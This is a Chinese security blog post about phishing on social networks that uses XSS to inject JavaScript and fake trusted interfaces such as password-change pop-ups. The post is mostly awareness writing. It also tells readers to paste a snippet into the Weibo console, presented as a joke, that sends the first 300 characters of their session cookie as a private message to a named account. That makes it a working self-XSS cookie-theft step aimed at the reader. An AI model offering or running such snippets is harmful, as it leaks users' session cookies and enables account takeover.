社交网络里的高级钓鱼攻击

休息了个端午节，这段时间，收听的好些微信公众账号都越来越相近了啊，原因是：思维干扰……

我继续我的风格，我自己私人的公众账号是“懒人在思考”，不过好久好久没发内容了，真是应对了个“懒”字。而在这个公众账号（网站安全中心）发的内容肯定都会定位在网站安全这块。

前段时间一直在写工具党、大数据黑客相关的科普文，今天开始换点口味好了，来看看前端攻击里一些“惊悚”的攻击方式。

今天只说高级钓鱼

如果深刻知道这种钓鱼攻击的人，估计以后会谈鱼色变，这次我不科普太多文字，只简单说下这种在大众面前几乎一片空白的攻击方式，所以看完本篇文字，很多人还会继续得瑟：“反正我不会中招”，深入的讲解我一般都放在一些内部的安全培训上了，如果有时间计划整出一篇paper出来，一定很精彩。

大家想想，在社交网络里（weibo也算，具有社交属性的都算），我们对很多专属于这个社交网络的风格元素是不是习以为常了，比如漂亮的登录页面、设置页面、修改密码页面、弹出层、聊天框、发消息界面等等，天天见，天天用，对这样的风格习以为常了，哪天出现一个风格类似的新功能（比如提示“密码异常，修改密码”的弹出层），也不会怀疑，还以为是新增的友好功能……

这些对于JavaScript来说都是可以伪造的啊，而且可以超级YD的伪造，代码量也不用多少，为什么呢？这得感谢那些伟大的前端工程师，他们封装了很多超级方便的接口:)

只要一个XSS（跨站脚本攻击），就可以引入任意JavaScript代码，鬼魂一般，伪造了一个看起来真的假界面，钓到了想要的关键数据，目的就达到了。其实在真实的高级攻击里，如果能不钓就不钓，多了交互就多了攻击复杂度，一段JavaScript也许通过一些Hacking技巧就能拿到如明文密码、隐私资料等数据，只要一招。

在社交网络里，用户体验好作为第一要素，对于攻击者来说，攻击也会讲究用户体验好，哪怕没有XSS，也可以完成攻击，想想，如何伪装界面？只是利用XSS的攻击更加原汁原味（我常说的原生态攻击方式）。

原生态除了UI可以利用原生，还有相关的JS库接口，比如针对weibo.com的一个小玩笑，大家可以用Chrome浏览器登录自己的微博，然后按f12打开“开发者工具”，在Console中，复制上如下代码，回车执行：

STK.core.io.ajax({method:'POST',url:'/aj/message/add',args:{text:document.cookie.substr(0,300),screen_name:'%E4%BD%99%E5%BC%A6'}})
1

如此简洁的代码，攻击者要是利用起来该有多方便:D

钓鱼无非就是欺骗，在社交网络里利用XSS进行的高级钓鱼攻击真的让人防不胜防，这种攻击我很早就提出，我感觉已经在逐渐流行了，这就是为什么这两年经常有人提到的“美工黑客”，恩，黑客为了生存，开始更猥琐了，开始接触美工了，美工的目的就是视觉欺骗。

最后：多一分警惕，少一次泄密……